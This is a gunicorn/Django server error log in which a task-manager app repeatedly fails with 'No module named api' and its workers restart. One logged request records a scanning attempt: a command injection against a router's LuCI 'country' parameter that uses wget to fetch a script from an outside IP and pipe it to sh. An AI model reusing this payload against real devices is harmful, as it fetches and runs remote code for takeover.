  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 941, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 953, in _find_and_load_unlocked
ModuleNotFoundError: No module named 'api'

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
    response = get_response(request)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/utils/deprecation.py", line 117, in __call__
    response = response or self.get_response(request)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 49, in inner
    response = response_for_exception(request, exc)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 114, in response_for_exception
    response = handle_uncaught_exception(request, get_resolver(get_urlconf()), sys.exc_info())
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 152, in handle_uncaught_exception
    callback = resolver.resolve_error_handler(500)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/resolvers.py", line 615, in resolve_error_handler
    callback = getattr(self.urlconf_module, 'handler%s' % view_type, None)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/utils/functional.py", line 48, in __get__
    res = instance.__dict__[self.name] = self.func(instance)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/resolvers.py", line 595, in urlconf_module
    return import_module(self.urlconf_name)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 678, in exec_module
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "/home/taskmanager/taskmanager/urls.py", line 10, in <module>
    path('api/', include('api.urls')),  # 假设你的API在一个叫做`api`的Django应用中
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/conf.py", line 34, in include
    urlconf_module = import_module(urlconf_module)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 941, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 953, in _find_and_load_unlocked
ModuleNotFoundError: No module named 'api'

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
    response = get_response(request)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/utils/deprecation.py", line 117, in __call__
    response = response or self.get_response(request)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 49, in inner
    response = response_for_exception(request, exc)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 114, in response_for_exception
    response = handle_uncaught_exception(request, get_resolver(get_urlconf()), sys.exc_info())
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 152, in handle_uncaught_exception
    callback = resolver.resolve_error_handler(500)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/resolvers.py", line 615, in resolve_error_handler
    callback = getattr(self.urlconf_module, 'handler%s' % view_type, None)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/utils/functional.py", line 48, in __get__
    res = instance.__dict__[self.name] = self.func(instance)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/resolvers.py", line 595, in urlconf_module
    return import_module(self.urlconf_name)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 678, in exec_module
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "/home/taskmanager/taskmanager/urls.py", line 10, in <module>
    path('api/', include('api.urls')),  # 假设你的API在一个叫做`api`的Django应用中
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/conf.py", line 34, in include
    urlconf_module = import_module(urlconf_module)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 941, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 953, in _find_and_load_unlocked
ModuleNotFoundError: No module named 'api'

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
    response = get_response(request)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/utils/deprecation.py", line 117, in __call__
    response = response or self.get_response(request)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 49, in inner
    response = response_for_exception(request, exc)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 114, in response_for_exception
    response = handle_uncaught_exception(request, get_resolver(get_urlconf()), sys.exc_info())
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 152, in handle_uncaught_exception
    callback = resolver.resolve_error_handler(500)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/resolvers.py", line 615, in resolve_error_handler
    callback = getattr(self.urlconf_module, 'handler%s' % view_type, None)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/utils/functional.py", line 48, in __get__
    res = instance.__dict__[self.name] = self.func(instance)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/resolvers.py", line 595, in urlconf_module
    return import_module(self.urlconf_name)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 678, in exec_module
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "/home/taskmanager/taskmanager/urls.py", line 10, in <module>
    path('api/', include('api.urls')),  # 假设你的API在一个叫做`api`的Django应用中
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/conf.py", line 34, in include
    urlconf_module = import_module(urlconf_module)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 941, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 953, in _find_and_load_unlocked
ModuleNotFoundError: No module named 'api'

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
    response = get_response(request)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/utils/deprecation.py", line 117, in __call__
    response = response or self.get_response(request)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 49, in inner
    response = response_for_exception(request, exc)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 114, in response_for_exception
    response = handle_uncaught_exception(request, get_resolver(get_urlconf()), sys.exc_info())
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 152, in handle_uncaught_exception
    callback = resolver.resolve_error_handler(500)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/resolvers.py", line 615, in resolve_error_handler
    callback = getattr(self.urlconf_module, 'handler%s' % view_type, None)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/utils/functional.py", line 48, in __get__
    res = instance.__dict__[self.name] = self.func(instance)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/resolvers.py", line 595, in urlconf_module
    return import_module(self.urlconf_name)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 678, in exec_module
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "/home/taskmanager/taskmanager/urls.py", line 10, in <module>
    path('api/', include('api.urls')),  # 假设你的API在一个叫做`api`的Django应用中
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/conf.py", line 34, in include
    urlconf_module = import_module(urlconf_module)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 941, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 953, in _find_and_load_unlocked
ModuleNotFoundError: No module named 'api'

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
    response = get_response(request)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/utils/deprecation.py", line 117, in __call__
    response = response or self.get_response(request)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 49, in inner
    response = response_for_exception(request, exc)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 114, in response_for_exception
    response = handle_uncaught_exception(request, get_resolver(get_urlconf()), sys.exc_info())
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 152, in handle_uncaught_exception
    callback = resolver.resolve_error_handler(500)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/resolvers.py", line 615, in resolve_error_handler
    callback = getattr(self.urlconf_module, 'handler%s' % view_type, None)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/utils/functional.py", line 48, in __get__
    res = instance.__dict__[self.name] = self.func(instance)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/resolvers.py", line 595, in urlconf_module
    return import_module(self.urlconf_name)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 678, in exec_module
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "/home/taskmanager/taskmanager/urls.py", line 10, in <module>
    path('api/', include('api.urls')),  # 假设你的API在一个叫做`api`的Django应用中
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/conf.py", line 34, in include
    urlconf_module = import_module(urlconf_module)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 941, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 953, in _find_and_load_unlocked
ModuleNotFoundError: No module named 'api'

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/gunicorn/workers/sync.py", line 135, in handle
    self.handle_request(listener, req, client, addr)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/gunicorn/workers/sync.py", line 178, in handle_request
    respiter = self.wsgi(environ, resp.start_response)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/wsgi.py", line 133, in __call__
    response = self.get_response(request)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/base.py", line 130, in get_response
    response = self._middleware_chain(request)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 49, in inner
    response = response_for_exception(request, exc)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 114, in response_for_exception
    response = handle_uncaught_exception(request, get_resolver(get_urlconf()), sys.exc_info())
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 152, in handle_uncaught_exception
    callback = resolver.resolve_error_handler(500)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/resolvers.py", line 615, in resolve_error_handler
    callback = getattr(self.urlconf_module, 'handler%s' % view_type, None)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/utils/functional.py", line 48, in __get__
    res = instance.__dict__[self.name] = self.func(instance)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/resolvers.py", line 595, in urlconf_module
    return import_module(self.urlconf_name)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 678, in exec_module
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "/home/taskmanager/taskmanager/urls.py", line 10, in <module>
    path('api/', include('api.urls')),  # 假设你的API在一个叫做`api`的Django应用中
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/conf.py", line 34, in include
    urlconf_module = import_module(urlconf_module)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 941, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 953, in _find_and_load_unlocked
ModuleNotFoundError: No module named 'api'
[2024-05-17 17:32:07 +0000] [16406] [ERROR] Error handling request /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.146.23.249%2Ft+-O-+|+sh%60)
Traceback (most recent call last):
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
    response = get_response(request)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/utils/deprecation.py", line 116, in __call__
    response = self.process_request(request)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/middleware/common.py", line 53, in process_request
    if self.should_redirect_with_slash(request):
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/middleware/common.py", line 70, in should_redirect_with_slash
    if not is_valid_path(request.path_info, urlconf):
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/base.py", line 153, in is_valid_path
    return resolve(path, urlconf)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/base.py", line 24, in resolve
    return get_resolver(urlconf).resolve(path)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/resolvers.py", line 560, in resolve
    for pattern in self.url_patterns:
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/utils/functional.py", line 48, in __get__
    res = instance.__dict__[self.name] = self.func(instance)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/resolvers.py", line 602, in url_patterns
    patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/utils/functional.py", line 48, in __get__
    res = instance.__dict__[self.name] = self.func(instance)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/resolvers.py", line 595, in urlconf_module
    return import_module(self.urlconf_name)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 678, in exec_module
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "/home/taskmanager/taskmanager/urls.py", line 10, in <module>
    path('api/', include('api.urls')),  # 假设你的API在一个叫做`api`的Django应用中
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/conf.py", line 34, in include
    urlconf_module = import_module(urlconf_module)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 941, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 953, in _find_and_load_unlocked
ModuleNotFoundError: No module named 'api'

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
    response = get_response(request)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/utils/deprecation.py", line 117, in __call__
    response = response or self.get_response(request)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 49, in inner
    response = response_for_exception(request, exc)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 114, in response_for_exception
    response = handle_uncaught_exception(request, get_resolver(get_urlconf()), sys.exc_info())
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 152, in handle_uncaught_exception
    callback = resolver.resolve_error_handler(500)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/resolvers.py", line 615, in resolve_error_handler
    callback = getattr(self.urlconf_module, 'handler%s' % view_type, None)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/utils/functional.py", line 48, in __get__
    res = instance.__dict__[self.name] = self.func(instance)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/resolvers.py", line 595, in urlconf_module
    return import_module(self.urlconf_name)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 678, in exec_module
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "/home/taskmanager/taskmanager/urls.py", line 10, in <module>
    path('api/', include('api.urls')),  # 假设你的API在一个叫做`api`的Django应用中
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/conf.py", line 34, in include
    urlconf_module = import_module(urlconf_module)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 941, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 953, in _find_and_load_unlocked
ModuleNotFoundError: No module named 'api'

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
    response = get_response(request)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/utils/deprecation.py", line 117, in __call__
    response = response or self.get_response(request)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 49, in inner
    response = response_for_exception(request, exc)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 114, in response_for_exception
    response = handle_uncaught_exception(request, get_resolver(get_urlconf()), sys.exc_info())
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 152, in handle_uncaught_exception
    callback = resolver.resolve_error_handler(500)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/resolvers.py", line 615, in resolve_error_handler
    callback = getattr(self.urlconf_module, 'handler%s' % view_type, None)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/utils/functional.py", line 48, in __get__
    res = instance.__dict__[self.name] = self.func(instance)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/resolvers.py", line 595, in urlconf_module
    return import_module(self.urlconf_name)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 678, in exec_module
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "/home/taskmanager/taskmanager/urls.py", line 10, in <module>
    path('api/', include('api.urls')),  # 假设你的API在一个叫做`api`的Django应用中
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/conf.py", line 34, in include
    urlconf_module = import_module(urlconf_module)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 941, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 953, in _find_and_load_unlocked
ModuleNotFoundError: No module named 'api'

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/gunicorn/workers/sync.py", line 135, in handle
    self.handle_request(listener, req, client, addr)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/gunicorn/workers/sync.py", line 178, in handle_request
    respiter = self.wsgi(environ, resp.start_response)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/wsgi.py", line 133, in __call__
    response = self.get_response(request)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/base.py", line 130, in get_response
    response = self._middleware_chain(request)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 49, in inner
    response = response_for_exception(request, exc)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 114, in response_for_exception
    response = handle_uncaught_exception(request, get_resolver(get_urlconf()), sys.exc_info())
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 152, in handle_uncaught_exception
    callback = resolver.resolve_error_handler(500)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/resolvers.py", line 615, in resolve_error_handler
    callback = getattr(self.urlconf_module, 'handler%s' % view_type, None)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/utils/functional.py", line 48, in __get__
    res = instance.__dict__[self.name] = self.func(instance)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/resolvers.py", line 595, in urlconf_module
    return import_module(self.urlconf_name)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 678, in exec_module
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "/home/taskmanager/taskmanager/urls.py", line 10, in <module>
    path('api/', include('api.urls')),  # 假设你的API在一个叫做`api`的Django应用中
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/conf.py", line 34, in include
    urlconf_module = import_module(urlconf_module)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 941, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 953, in _find_and_load_unlocked
ModuleNotFoundError: No module named 'api'
[2024-05-18 01:38:13 +0800] [16401] [INFO] Handling signal: term
[2024-05-17 17:38:13 +0000] [16408] [INFO] Worker exiting (pid: 16408)
[2024-05-17 17:38:13 +0000] [16404] [INFO] Worker exiting (pid: 16404)
[2024-05-17 17:38:13 +0000] [16406] [INFO] Worker exiting (pid: 16406)
[2024-05-18 01:38:14 +0800] [16401] [INFO] Shutting down: Master
[2024-05-18 01:38:14 +0800] [20250] [INFO] Starting gunicorn 21.2.0
[2024-05-18 01:38:14 +0800] [20250] [INFO] Listening at: unix:/home/taskmanager/taskmanager.sock (20250)
[2024-05-18 01:38:14 +0800] [20250] [INFO] Using worker: sync
[2024-05-18 01:38:14 +0800] [20253] [INFO] Booting worker with pid: 20253
[2024-05-18 01:38:14 +0800] [20255] [INFO] Booting worker with pid: 20255
[2024-05-18 01:38:14 +0800] [20257] [INFO] Booting worker with pid: 20257
[2024-05-18 06:46:19 +0000] [20257] [INFO] Worker exiting (pid: 20257)
[2024-05-18 14:46:19 +0800] [20250] [INFO] Handling signal: term
[2024-05-18 06:46:19 +0000] [20253] [INFO] Worker exiting (pid: 20253)
[2024-05-18 14:46:19 +0800] [20250] [ERROR] Worker (pid:20257) was sent SIGTERM!
[2024-05-18 06:46:19 +0000] [20255] [INFO] Worker exiting (pid: 20255)
[2024-05-18 14:46:19 +0800] [20250] [INFO] Shutting down: Master
[2024-05-18 14:46:41 +0800] [942] [INFO] Starting gunicorn 21.2.0
[2024-05-18 14:46:41 +0800] [942] [INFO] Listening at: unix:/home/taskmanager/taskmanager.sock (942)
[2024-05-18 14:46:41 +0800] [942] [INFO] Using worker: sync
[2024-05-18 14:46:41 +0800] [1496] [INFO] Booting worker with pid: 1496
[2024-05-18 14:46:41 +0800] [1518] [INFO] Booting worker with pid: 1518
[2024-05-18 14:46:41 +0800] [1541] [INFO] Booting worker with pid: 1541
